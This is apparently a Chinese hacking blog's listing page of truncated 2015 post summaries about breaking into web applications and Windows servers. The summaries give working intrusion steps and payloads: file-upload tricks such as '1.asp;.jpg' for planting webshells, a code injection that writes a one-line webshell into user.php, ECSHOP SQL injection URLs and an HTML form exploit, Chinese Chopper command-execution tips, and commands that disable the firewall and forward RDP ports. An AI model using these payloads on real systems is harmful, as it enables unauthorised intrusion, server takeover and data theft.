摘要: 漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变.... 上传1.asp;,jpg 阅读全文
posted @ 2015-10-30 11:37 小生观察室 阅读(170) 评论(0) 推荐(0) 编辑
摘要: 默认账号密码admin,验证码8888 系统设置 网站配置 上传文件配置 支付平台上传配置,添加AsPX空格 格式 之后系统设置,支付方式管理 在线支付平台管理 随便点修改一个内容上传1.jpg文件burp截包 修改上传文件名1.AsPX空格 会看到路径 拿到aspx的shell 阅读全文
posted @ 2015-10-25 18:35 小生观察室 阅读(58) 评论(0) 推荐(0) 编辑
摘要: 3389 相关,以下配合PR更好: a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)b、内网环境(lcx.exe)c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /con 阅读全文
posted @ 2015-10-25 18:12 小生观察室 阅读(2046) 评论(0) 推荐(0) 编辑
摘要: 漏洞文件/apps/vote/controller/vote.phpapp.xxx.com/?app=vote&controller=vote&action=total&contentid=1 获取管理员id ?app=vote&controller=vote&action=total&conten 阅读全文
posted @ 2015-10-25 17:13 小生观察室 阅读(1682) 评论(0) 推荐(0) 编辑
摘要: 附上两个菜刀执行cmd 技巧 方法1; 自己上传cmd到可执行命令 右击菜刀 虚拟终端 方法2:选择一句话 右击虚拟终端\>whoami[Err] 拒绝访问 \> setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe D:\网站\注 阅读全文
posted @ 2015-10-25 16:43 小生观察室 阅读(68) 评论(0) 推荐(0) 编辑
摘要: 360eshop安全网店系统 采用FCK编译器 版本:2.6.4.1 测试平台:IIS6,两个test页面,是漏洞的关键,格式 x.asa;jpg 顺利上传 http://site/expansion/fckeditor/editor/filemanager/connectors/test.html 阅读全文
posted @ 2015-10-21 10:39 小生观察室 阅读(160) 评论(0) 推荐(0) 编辑
摘要: 0X01 拿webshell。登陆后发现只有一个语言编辑权利,但这正是我们为了拿webshell分配的,已经足够了。 由于将变量直接写入user.php文件并且没有对变量过滤,导致可以插入代码并执行。 查找用户信息 在用户信息后面添加生成一句话木马的代码 ${${fputs(fopen(base64 阅读全文
posted @ 2015-10-18 13:05 小生观察室 阅读(257) 评论(0) 推荐(0) 编辑
摘要: 注入:购物车中一定需要有物品!!! 登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了 <form name="form1" method="post"> ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<i 阅读全文
posted @ 2015-10-18 12:42 小生观察室 阅读(208) 评论(0) 推荐(0) 编辑
摘要: http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,conca 阅读全文
posted @ 2015-10-17 21:53 小生观察室 阅读(37) 评论(0) 推荐(0) 编辑
摘要: 简要描述: 通过后台写入aspx木马,直接拿到webshell,然后获取整个服务器权限。 详细说明: 1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templa 阅读全文
posted @ 2015-10-12 10:07 小生观察室 阅读(452) 评论(0) 推荐(0) 编辑